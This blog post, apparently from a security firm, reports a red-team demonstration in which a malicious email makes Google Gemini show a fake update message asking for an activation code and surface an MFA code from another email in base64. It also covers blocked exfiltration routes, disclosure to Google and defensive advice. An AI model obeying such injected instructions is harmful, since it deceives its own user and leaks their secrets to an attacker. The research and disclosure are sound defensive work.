When your AI Assistant has an evil twin

TL;DR:

We demonstrate how Google Gemini Advanced can be coerced into performing social engineering attacks.
By sending a malicious email, attackers can manipulate Gemini's responses when analyzing the user's mailbox, causing it to display convincing messages that trick the user into revealing confidential information from other emails.
Currently, there is no foolproof solution to these attacks, making it crucial for users to exercise caution when interacting with LLMs that have access to their sensitive data.

1. Introduction

The recent Google I/O 2024 event (https://io.google/2024/) highlighted a growing trend: empowering Large Language Models (LLMs) with access to user data, like emails, to provide more helpful and contextual assistance. Google Gemini Advanced, their answer to OpenAI's ChatGPT and Microsoft's Copilot, is a prime example of this trend. While these advancements offer valuable benefits, they also raise significant security concerns. One such concern is the vulnerability of LLMs to indirect prompt injection attacks, a risk we've discussed in previous articles ([1, 2, 3]).

2.Our demo scenario

The following video shows the full demo scenario where an attacker’s email manipulates Gemini [4] to trick the user into revealing a secret code present in a different email:

Here's how the attack unfolds:

Malicious Email: An attacker sends an email containing a prompt that instructs Gemini to display a social engineering message to the user, falsely promising an update to a new version of Gemini and requesting a code to activate it. Gemini is then instructed to find the confidential information the attacker is after (e.g., a recovery or MFA code) within the user's mailbox and display it in base64 format, disguising its true nature:

User Interaction with Gemini: The user asks Gemini to summarize their recent emails.
Prompt Injection: When Gemini processes the attacker's email, the prompt is triggered, causing Gemini to include the phishing message and instructions at the end of its summary. This malicious content appears distinct from the summary, resembling a genuine message from Gemini:

Data Compromise: If the user follows the instructions and submits the "activation code," the attacker gains access to the confidential information.

(Note: In this demonstration, the prompt is not hidden, as the user is relying on Gemini to manage their inbox and may not read the emails themselves.)

3. Gemini's existing mitigations

Google has been putting a lot of effort into making Gemini as secure as possible against prompt injection attacks. The attack we described had to rely on social engineering techniques and user interaction to succeed. The user must trust and act upon the information provided by Gemini.

Other techniques that could be used for automatic data exfiltration that did not require social engineering or just require very minimal user interaction (such as just clicking a link) were all stopped. These include:

Image-Based Exfiltration: A common technique for data exfiltration via prompt injection is to coerce the LLM into generating an image with encoded information in its URL, allowing for data exfiltration without user interaction (as the browser will automatically visit the URL as it attempts to display the image). However, we observed that Google had implemented robust safeguards to prevent this. In our tests, any attempt to generate such an image resulted in the chat session being terminated with an error.
URL-Based Exfiltration: Similarly, attempts to have Gemini generate phishing links containing sensitive information directly in the URL (e.g., query parameters, subdomains) were unsuccessful. Google's extensive safeguards appear to effectively vet links produced by Gemini (probably in the same way as image source URLs), preventing data exfiltration through this method.

4. Responsible disclosure

We disclosed this issue to Google on May 19th, 2024. Google acknowledged it as an Abuse Risk on May 30th, and on 31st May they communicated that their internal team was aware of this issue but would not fix it for the moment being. Google's existing mitigations prevent the most critical data exfiltration attempts already, but stopping social engineering attacks like the one we demonstrated is challenging.

5. Recommendations

The next section will cover recomemndations for users and developers of GenAI based assistants.

5.1 Recommendations for Users

We advise users to exercise caution when using LLM assistants like Gemini or ChatGPT. These tools are undoubtedly useful, but they become dangerous when handling untrusted content from third parties, such as emails, web pages, and documents. Despite extensive testing and safeguards, the safety of responses cannot be guaranteed when untrusted content enters the LLM's prompt.

5.2 Recommendations for Developers

Developers of LLM assistants should implement robust safeguards around LLM input and output. We discuss the key recommendations and strategies in our webinar titled Building Secure LLM Applications webinar, and in the associated security canvas:

(Download: https://www.withsecure.com/content/dam/with-secure/documents/campaigns/2024-WS-Consulting_webinar_LLM-prompt-injection-defence-canvas.pdf.coredownload.pdf)

In summary:

Treat LLMs as untrusted entities.
Implement safeguards to minimize the attacker's operational space by:
- Uilizing blocklists and machine learning models to identify and filter out malicious or unwanted content in both input and output.
- Adopting a semantic routing solution (such as [7]) to categorize incoming queries into topics, creating a list of topics/questions your assistant is allowed to help with and routing all other unwanted input to default messages such as “Sorry, we can’t help with that”.
Assume that harmful outputs may still occur despite safeguards. All URLs (such as those in links and images) produced by the LLM should be either blocked or validated against a list of allowed domains to prevent data exfiltration attacks.
Apply classic application security measures, such as output encoding to prevent Cross-Site Scripting (XSS) attacks and Content Security Policy (CSP) to control the origins of external resources.
Inform users that LLM-generated answers, especially those based on third-party content like emails, web pages, and documents, should be validated and not blindly trusted.

6. References

Should you let ChatGPT control your browser?, https://labs.withsecure.com/publications/browser-agents-llm-prompt-injection
Synthetic Recollections: A Case Study in Prompt Injection for ReAct LLM Agents, https://labs.withsecure.com/publications/llm-agent-prompt-injection
Domain-specific prompt injection detection, https://labs.withsecure.com/publications/detecting-prompt-injection-bert-based-classifier
Google Gemini, https://gemini.google.com/
LLM01:2023 - Prompt Injections. OWASP Top 10 for Large Language Model Applications, https://owasp.org/www-project-top-10-for-large-language-model-applications/Archive/0_1_vulns/Prompt_Injection.html
OWASP Top 10 for Large Language Model Applications, https://owasp.org/www-project-top-10-for-large-language-model-applications/
Aurelio Semantic Router, https://github.com/aurelio-labs/semantic-router

Further Resources

Generative AI – An Attacker's View

This blog explores the role of GenAI in cyber attacks, common techniques used by hackers and strategies to protect against Generative AI-driven threats.

Creatively malicious prompt engineering

The experiments demonstrated in our research proved that large language models can be used to craft email threads suitable for spear phishing attacks, "text deepfake” a person’s writing style, apply opinion to written content, write in a certain style, and craft convincing looking fake articles, even if relevant information wasn’t included in the model’s training data.

Domain-specific prompt injection detection

This article focuses on the detection of potential adversarial prompts by leveraging machine learning models trained to identify signs of injection attempts. We detail our approach to constructing a domain-specific dataset and fine-tuning DistilBERT for this purpose. This technical exploration focuses on integrating this classifier within a sample LLM application, covering its effectiveness in realistic scenarios.

Should you let ChatGPT control your browser?

In this article, we expand our previous analysis, with a focus on autonomous browser agents - web browser extensions that allow LLMs a degree of control over the browser itself, such as acting on behalf of users to fetch information, fill forms, and execute web-based tasks.

Case study: Synthetic recollections

This blog post presents plausible scenarios where prompt injection techniques might be used to transform a ReACT-style LLM agent into a “Confused Deputy”. This involves two sub-categories of attacks. These attacks not only compromise the integrity of the agent's operations but can also lead to unintended outcomes that could benefit the attacker or harm legitimate users.

Generative AI Security

Are you planning or developing GenAI-powered solutions, or already deploying these integrations or custom solutions? We can help you identify and address potential cyber risks every step of the way.

Donato Capitella